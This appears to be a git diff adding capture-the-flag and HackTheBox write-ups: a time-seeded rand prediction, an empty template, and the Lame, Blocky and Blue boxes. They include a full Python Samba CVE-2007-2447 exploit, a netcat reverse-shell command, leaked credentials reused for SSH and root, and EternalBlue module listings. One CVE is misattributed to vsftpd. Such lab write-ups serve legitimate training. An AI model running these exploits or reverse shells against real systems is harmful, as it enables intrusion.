+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → wget https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow
+
+ --2021-03-07 13:24:34-- https://github.com/guyinatuxedo/nightmare/raw/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.121.3
+ Connecting to github.com (github.com)|140.82.121.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow [following]
+ --2021-03-07 13:24:35-- https://raw.githubusercontent.com/guyinatuxedo/nightmare/master/modules/09-bad_seed/hsctf19_tuxtalkshow/tuxtalkshow
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.109.133, 185.199.110.133, 185.199.108.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.109.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 21112 (21K) [application/octet-stream]
+ Saving to: ‘tuxtalkshow’
+
+ tuxtalkshow 100%[================================================================>] 20.62K --.-KB/s in 0.003s
+
+ 2021-03-07 13:24:35 (5.81 MB/s) - ‘tuxtalkshow’ saved [21112/21112]
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → file tuxtalkshow
+ tuxtalkshow: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=8c0d2b94392e01fecb4b54999cc8afe6fa99653d, for GNU/Linux 3.2.0, not stripped
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → chmod +x tuxtalkshow
+
+
+
+
+` ![]()
+
+## Solution
+
+First let's run pwn checksec on the binary file before executing it to see what it does:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → pwn checksec tuxtalkshow
+ [*] '/home/nothing/binexp/3/tux/tuxtalkshow'
+ Arch: amd64-64-little
+ RELRO: Partial RELRO
+ Stack: Canary found
+ NX: NX enabled
+ PIE: PIE enabled
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./tuxtalkshow
+ Welcome to Tux Talk Show 2019!!!
+ Enter your lucky number: 13371337
+
+
+
+So here we have a 64bit binary with PIE enabled. When we run it it prompts us for a number. So let's check it out from inside of ghidra:
+
+
+
+And here we get a gigantic main function:
+
+
+ undefined8 main(void)
+
+ {
+ int iVar1;
+ time_t tVar2;
+ basic_ostream *pbVar3;
+ long in_FS_OFFSET;
+ int local_290;
+ int local_28c;
+ int local_288;
+ int local_284;
+ undefined4 local_280;
+ undefined4 local_27c;
+ undefined4 local_278;
+ undefined4 local_274;
+ undefined4 local_270;
+ undefined4 local_26c;
+ int local_268 [8];
+ basic_string local_248 [32];
+ basic_istream local_228 [520];
+ long local_20;
+
+ local_20 = *(long *)(in_FS_OFFSET + 0x28);
+ std::basic_ifstream>::basic_ifstream((char *)local_228,0x1020b0);
+ tVar2 = time((time_t *)0x0);
+ srand((uint)tVar2);
+ /* try { // try from 0010127e to 001012c0 has its CatchHandler @ 00101493 */
+ pbVar3 = std::operator<<((basic_ostream *)std::cout,"Welcome to Tux Talk Show 2019!!!");
+ std::basic_ostream>::operator<<
+ ((basic_ostream> *)pbVar3,
+ std::endl>);
+ std::operator<<((basic_ostream *)std::cout,"Enter your lucky number: ");
+ std::basic_istream>::operator>>
+ ((basic_istream> *)std::cin,&local;_290);
+ local_280 = 0x79;
+ local_27c = 0x12c97f;
+ local_278 = 0x135f0f8;
+ local_274 = 0x74acbc6;
+ local_270 = 0x56c614e;
+ local_26c = 0xffffffe2;
+ local_268[0] = 0x79;
+ local_268[1] = 0x12c97f;
+ local_268[2] = 0x135f0f8;
+ local_268[3] = 0x74acbc6;
+ local_268[4] = 0x56c614e;
+ local_268[5] = 0xffffffe2;
+ local_28c = 0;
+ while (local_28c < 6) {
+ iVar1 = rand();
+ local_268[local_28c] = local_268[local_28c] - (iVar1 % 10 + -1);
+ local_28c = local_28c + 1;
+ }
+ local_288 = 0;
+ local_284 = 0;
+ while (local_284 < 6) {
+ local_288 = local_288 + local_268[local_284];
+ local_284 = local_284 + 1;
+ }
+ if (local_288 == local_290) {
+ std::__cxx11::basic_string,std::allocator>::basic_string();
+ /* try { // try from 00101419 to 00101448 has its CatchHandler @ 0010147f */
+ std::operator>>(local_228,local_248);
+ pbVar3 = std::operator<<((basic_ostream *)std::cout,local_248);
+ std::basic_ostream>::operator<<
+ ((basic_ostream> *)pbVar3,
+ std::endl>);
+ std::__cxx11::basic_string,std::allocator>::~basic_string
+ ((basic_string,std::allocator> *)local_248);
+ }
+ std::basic_ifstream>::~basic_ifstream
+ ((basic_ifstream> *)local_228);
+ if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+Here we cansee that it starts off by scanning the contents of flag.txt and saves it into **local_228**. Then it initialized an integer array with size entries, although the decompilation only shows 4. So let's look at the assembly code:
+
+
+ 001012bc e8 8f fd CALL operator>> undefined operator>>(basic_istre
+ ff ff
+ } // end try from 0010127e to 001012c0
+ 001012c1 c7 85 88 MOV dword ptr [RBP + local_280],0x79
+ fd ff ff
+ 79 00 00 00
+ 001012cb c7 85 8c MOV dword ptr [RBP + local_27c],0x12c97f
+ fd ff ff
+ 7f c9 12 00
+ 001012d5 c7 85 90 MOV dword ptr [RBP + local_278],0x135f0f8
+ fd ff ff
+ f8 f0 35 01
+ 001012df c7 85 94 MOV dword ptr [RBP + local_274],0x74acbc6
+ fd ff ff
+ c6 cb 4a 07
+ 001012e9 c7 85 98 MOV dword ptr [RBP + local_270],0x56c614e
+ fd ff ff
+ 4e 61 6c 05
+ 001012f3 c7 85 9c MOV dword ptr [RBP + local_26c],0xffffffe2
+ fd ff ff
+ e2 ff ff ff
+
+
+
+We also see that it uses time as a seed. It performs an algorithm where it will generate random numbers by using time a sa seed to edit the values of array, and then it accumulate all of those values to end up with the number we are supposed to guess. Since the rand function is directly based off of the seed, and since the seed is the time, we know what the values the rand function will output, and thus end up with the following C program:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → vim exploit.c
+
+
+
+
+ ****#include <****stdio.h>
+ #include <****stdlib.h>
+ #include <****stdint.h>
+ #include <****time.h>
+
+ int main()
+ {
+ int array[6];
+ int i, output;
+ uint32_t randVal, ans;
+
+ srand(time(0));
+
+
+ i = 0;
+
+ array[0] = 0x79;
+ array[1] = 0x12c97f;
+ array[2] = 0x135f0f8;
+ array[3] = 0x74acbc6;
+ array[4] = 0x56c614e;
+ array[5] = 0xffffffe2;
+
+ while (i < 6)
+ {
+ randVal = rand();
+ array[i] = array[i] - ((randVal % 10) - 1);
+ i += 1;
+ }
+
+ i = 0;
+ output = 0;
+
+ while (i < 6)
+ {
+ output = output + array[i];
+ i += 1;
+ }
+
+
+ printf("%d\n", output);
+ }
+
+
+Then we compile our C code:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → gcc exploit.c -o exploit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+
+
+
+let's try it on the binary file:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+ 234874834
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+ 234874839
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+ 234874828
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit | ./tuxtalkshow
+ Welcome to Tux Talk Show 2019!!!
+ Enter your lucky number: flag{g0tt3m_boyz}
+
+
+
+And that's it ! We have been able to print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
diff --git a/Easy/0.md b/Easy/0.md
new file mode 100644
index 0000000..4d1202b
--- /dev/null
+++ b/Easy/0.md
@@ -0,0 +1,145 @@
+# BOXNAME Writeup
+
+
+
+## Introduction :
+
+Boxname is an easy box released back in MONTH YEAR.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+
+
+## **Part 2 : Getting User Access**
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/1.md b/Easy/1.md
new file mode 100644
index 0000000..dd1f5a8
--- /dev/null
+++ b/Easy/1.md
@@ -0,0 +1,211 @@
+# Lame Writeup
+
+
+
+## Introduction :
+
+**Lame** is an easy Linux box which was released back in March 2017. It features a common vulnerability which could be exploited using a metasploit module.
+
+## **Requirerements :**
+
+ * [Linux commands](../../CS/LTerm.html)
+ * [Nmap](../../CS/nmap.html)
+ * [Searchsploit](../../CS/searchsploit.html)
+ * [Python](../../CS/python.html)
+ * [Netcat](../../CS/netcat.html)
+
+
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [/home/nihilist] → nmap -sC -sV 10.10.10.3
+ Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 10:55 EDT
+ Nmap scan report for 10.10.10.3
+ Host is up (0.27s latency).
+ Not shown: 996 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 2.3.4
+ |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to 10.10.14.6
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | vsFTPd 2.3.4 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
+ | ssh-hostkey:
+ | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
+ |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
+ 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+ 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: mean: 3h44m23s, deviation: 0s, median: 3h44m23s
+ | smb-os-discovery:
+ | OS: Unix (Samba 3.0.20-Debian)
+ | NetBIOS computer name:
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2019-06-11T10:39:56-04:00
+ |_smb2-time: Protocol negotiation failed (SMB2)
+ Service detection performed.
+
+ Nmap done: 1 IP address (1 host up) scanned in 98.43 seconds
+
+
+Here we can see that the ports 21, 22, 139 and 445 are opened The port 21 is running an outdated version of vsftpd (here: v2.3.4 current:v3.0.3), this is going to be our main focus for the next part.
+
+## **Part 2 : Getting User Access**
+
+We know that port 21 is running vsftpd 2.3.4, let's see if there are exploits we can use using the **searchsploit** command:
+
+
+ λ nihilist [~] → searchsploit vsftpd 2.3.4
+ ------------------------------------------------------ ------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------ ------------------------------
+ vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)| exploits/unix/remote/17491.rb
+ ------------------------------------------------------ ------------------------------
+ Shellcodes: No Result
+
+
+We could use the metasploit module exploiting the present CVE-2007-2447 But we can also use the following [python script](https://github.com/Jack-Barradell/exploits/blob/master/CVE-2007-2447/cve-2007-2447.py) in order to exploit our target machine.
+
+
+ # CVE-2007-2447 - RCE in Samba
+
+ import getopt
+ import sys
+ from smb import SMBConnection
+
+
+ def usage():
+ print('CVE-2007-2447 - RCE In Samba 2.0.20 < 3.0.25rc3')
+ print()
+ print('Flags:')
+ print('{} - Target Host'.format('\t-t --target'.ljust(20,' ')))
+ print('{} - Target Port'.format('\t-p --port'.ljust(20,' ')))
+ print('{} - Command to execute'.format('\t-c --cmd'.ljust(20,' ')))
+ print()
+
+
+ def main():
+ try:
+ opts,args = getopt.getopt(sys.argv[1:],'t:p:c:',['target','port','cmd'])
+ except getopt.GetoptError as e:
+ print(str(e))
+ usage()
+ sys.exit(1)
+ target = None
+ port = None
+ cmd = None
+ for o,a in opts:
+ if o in ('-t','--target'):
+ target = a
+ elif o in ('-p','--port'):
+ try:
+ port = int(a)
+ except ValueError:
+ print('[!] Invalid port provided, must be an int')
+ usage()
+ sys.exit(1)
+ elif o in ('-c','--cmd'):
+ cmd = a
+ else:
+ print('[!] Invalid option {} with value: {}'.format(o,a))
+ usage()
+ sys.exit(1)
+
+ missing_param = False
+
+ if target is None:
+ print('[!] Must provide target')
+ missing_param = True
+
+ if port is None:
+ print('[!] Must provide port')
+ missing_param = True
+
+ if cmd is None:
+ print('[!] Must provide command')
+ missing_param = True
+
+ if missing_param:
+ usage()
+ sys.exit(1)
+
+ print('[+] Generating exploit')
+ exploit = '/=`nohup {}`'.format(cmd)
+
+ c = SMBConnection.SMBConnection(exploit, '', '', '')
+
+ try:
+ c.connect(target, port, timeout=1)
+ except:
+ print('[+] Exploit sent')
+
+
+ if __name__ == '__main__':
+ main()
+
+
+With which we are now able to run using the following commands within 2 separate terminals :
+
+_Terminal n°1 :_
+
+
+ λ nihilist [~] → nc -lvnp 4444
+
+
+_Terminal n°2 :_
+
+
+ λ nihilist [~] → python3 cve-2007-2447.py -t 10.10.10.3 -p 445 -c "nc -e /bin/bash 10.10.14.10 4444"
+ [+] Generating exploit
+ [+] Exploit sent
+
+
+Which gives us access to the machine. Through a reverse shell back to our local address **10.10.14.10** at the listening **4444** port. within our first Terminal.
+
+_Terminal n°1 :_
+
+
+ λ nihilist [~] → nc -lvnp 4444
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.3] 43358
+ # id
+ uid=0(root) gid=0(root)
+
+
+We now have not only user access, but also an Elevated-privilege Reverse Shell which is going to allow us to read both the user and root flags.
+
+## **Part 3 : The Root Access**
+
+All we need to do is print out both the user flag and root flag since we are now logged on as root.
+
+
+ # id
+ uid=0(root) gid=0(root)
+
+ #cat /home/makis/user.txt
+ [REDACTED]
+
+ #cat /root/root.txt
+ [REDACTED]
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/10.md b/Easy/10.md
new file mode 100644
index 0000000..f8ebf9a
--- /dev/null
+++ b/Easy/10.md
@@ -0,0 +1,292 @@
+# Blocky Writeup
+
+
+
+## Introduction :
+
+Blocky was an easy Linux Box that was released back in July 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.37
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 10:54 CET
+ Nmap scan report for 10.10.10.37
+ Host is up (0.085s latency).
+ Not shown: 996 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp ProFTPD 1.3.5a
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
+ | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
+ |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-generator: WordPress 4.8
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: BlockyCraft - Under Construction!
+ 8192/tcp closed sophos
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Looking at the results, we see that port 80 is serving the http service, with wordpress. We can therefore use the wordpress scanning command called **wpscan**.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → wpscan --url 10.10.10.37 --enumerate
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _ | _ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.4
+
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
+ _______________________________________________________________
+
+ [i] Updating the Database ...
+ [i] Update completed.
+
+ [+] URL: http://10.10.10.37/
+ [+] Started: Thu Nov 14 11:04:57 2019
+
+ Interesting Finding(s):
+
+ [+] http://10.10.10.37/
+ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.37/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
+
+ [+] http://10.10.10.37/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.37/wp-cron.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 60%
+ | References:
+ | - https://www.iplocation.net/defend-wordpress-from-ddos
+ | - https://github.com/wpscanteam/wpscan/issues/1299
+
+ [+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://10.10.10.37/index.php/feed/, https://wordpress.org/?v=4.8
+ | - http://10.10.10.37/index.php/comments/feed/, https://wordpress.org/?v=4.8
+
+ [+] WordPress theme in use: twentyseventeen
+ | Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
+ | Last Updated: 2019-05-07T00:00:00.000Z
+ | Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
+ | [!] The version is out of date, the latest version is 2.2
+ | Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
+ | Style Name: Twenty Seventeen
+ | Style URI: https://wordpress.org/themes/twentyseventeen/
+ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
+ | Author: the WordPress team
+ | Author URI: https://wordpress.org/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.3 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
+
+ [+] Enumerating Vulnerable Plugins (via Passive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:07 <====================================> (316 / 316) 100.00% Time: 00:00:07
+ [+] Checking Theme Versions (via Passive and Aggressive Methods)
+
+ [i] No themes Found.
+
+ [+] Enumerating Timthumbs (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:53 <==================================> (2575 / 2575) 100.00% Time: 00:00:53
+
+ [i] No Timthumbs Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:00 <=======================================> (21 / 21) 100.00% Time: 00:00:00
+
+ [i] No Config Backups Found.
+
+ [+] Enumerating DB Exports (via Passive and Aggressive Methods)
+ Checking DB Exports - Time: 00:00:00 <===========================================> (36 / 36) 100.00% Time: 00:00:00
+
+ [i] No DB Exports Found.
+
+ [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
+ Brute Forcing Attachment IDs - Time: 00:00:03 <================================> (100 / 100) 100.00% Time: 00:00:03
+
+ [i] No Medias Found.
+
+ [+] Enumerating Users (via Passive and Aggressive Methods)
+ Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00
+
+ [i] User(s) Identified:
+
+ [+] notch
+ | Found By: Author Posts - Author Pattern (Passive Detection)
+ | Confirmed By:
+ | Wp Json Api (Aggressive Detection)
+ | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page;=1
+ | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Login Error Messages (Aggressive Detection)
+
+ [+] Notch
+ | Found By: Rss Generator (Passive Detection)
+ | Confirmed By: Login Error Messages (Aggressive Detection)
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
+
+ [+] Finished: Thu Nov 14 11:06:14 2019
+ [+] Requests Done: 3119
+ [+] Cached Requests: 10
+ [+] Data Sent: 768.632 KB
+ [+] Data Received: 14.199 MB
+ [+] Memory used: 224.906 MB
+ [+] Elapsed time: 00:01:17
+
+
+We see that we have an username to work with, named **notch** We will now run the gobuster command to see if we are able to enumerate interesting directories.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → gobuster -e -u 10.10.10.37 -w wordlist.txt
+
+
+Looking at the results we see that gobuster found the directory named **/plugins** We now browse to the folder gobuster found to see what we can enumerate there.
+
+
+
+We will now download the files that are available for us here, in order to examine them First of all we'll open up the BlockyCore.jar using an archive explorer and then extract the blockycore.class located inside /com/myfirstplugin/
+
+Once the .class file is extracted all we need to do to print out it's contents is to use the **jad** command.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Blocky] → jad BlockyCore.class
+ Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
+ Generating BlockyCore.jad
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Blocky] → cat BlockyCore.jad
+ // Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
+ // Jad home page: http://www.geocities.com/kpdus/jad.html
+ // Decompiler options: packimports(3)
+ // Source File Name: BlockyCore.java
+
+ package com.myfirstplugin;
+
+
+ public class BlockyCore
+ {
+
+ public BlockyCore()
+ {
+ sqlHost = "localhost";
+ sqlUser = "root";
+ sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
+ }
+
+ public void onServerStart()
+ {
+ }
+
+ public void onServerStop()
+ {
+ }
+
+ public void onPlayerJoin()
+ {
+ sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
+ }
+
+ public void sendMessage(String s, String s1)
+ {
+ }
+
+ public String sqlHost;
+ public String sqlUser;
+ public String sqlPass;
+ }
+
+
+We now have credentials to work with : **notch : 8YsqfCTnvxAUeduzjNSXe22** Our previous nmap scan returned that 22 ssh port is opened.
+
+## **Part 3 : Getting Root Access**
+
+We should be able to ssh into the machine with the aforementionned credentials.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → ssh notch@10.10.10.37
+ notch@10.10.10.37 password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 7 packages can be updated.
+ 7 updates are security updates.
+
+
+ Last login: Sun Dec 24 09:34:35 2017
+ notch@Blocky:~$ whoami
+ notch
+ notch@Blocky:~$ uname -a
+ Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+ notch@Blocky:~$ cat /home/notch/user.txt
+ 59XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+We have been able to get our user flag ! now we just need to escalate privileges, typing sudo -l shows us that we are able to type the command **sudo su** to spawn a root shell.
+
+
+ notch@Blocky:~$ sudo -l
+ [sudo] password for notch:
+ Matching Defaults entries for notch on Blocky:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User notch may run the following commands on Blocky:
+ (ALL : ALL) ALL
+ notch@Blocky:~$ cat /root/root.txt
+ cat: /root/root.txt: Permission denied
+ notch@Blocky:~$ sudo su
+ root@Blocky:/home/notch# cat /root/root.txt
+ 0aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print the root flag thanks to a simple sudo -l command.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/11.md b/Easy/11.md
new file mode 100644
index 0000000..260bea8
--- /dev/null
+++ b/Easy/11.md
@@ -0,0 +1,165 @@
+# Blue Writeup
+
+
+
+## Introduction :
+
+Blue was an easy Windows box released back in July 2017. It features a vulnerability onto which the well-known exploit "EternalBlue" can be used.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 21:24 CET
+ Nmap scan report for 10.10.10.40
+ Host is up (0.083s latency).
+ Not shown: 991 closed ports
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
+ 49152/tcp open msrpc Microsoft Windows RPC
+ 49153/tcp open msrpc Microsoft Windows RPC
+ 49154/tcp open msrpc Microsoft Windows RPC
+ 49155/tcp open msrpc Microsoft Windows RPC
+ 49156/tcp open msrpc Microsoft Windows RPC
+ 49157/tcp open msrpc Microsoft Windows RPC
+ Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 2m15s, deviation: 2s, median: 2m14s
+ | smb-os-discovery:
+ | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
+ | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
+ | Computer name: haris-PC
+ | NetBIOS computer name: HARIS-PC\x00
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2019-11-15T20:28:09+00:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-11-15T20:28:07
+ |_ start_date: 2019-11-15T14:45:46
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 76.50 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan result picked up a combination of smb and Windows 7 SP1 7601 , this may ring a bell with the leaked NSA tool called "EternalBlue", which takes advantage of the vulnerability affecting SMBv1 which is now known to mishandle special packets from attackers, this CVE has been fixed with the MS17-010 patch. Let's see if it works on this box.
+
+
+ msf5 > search eternalblue
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
+ 1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
+ 2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
+ 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
+ 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
+
+
+
+
+
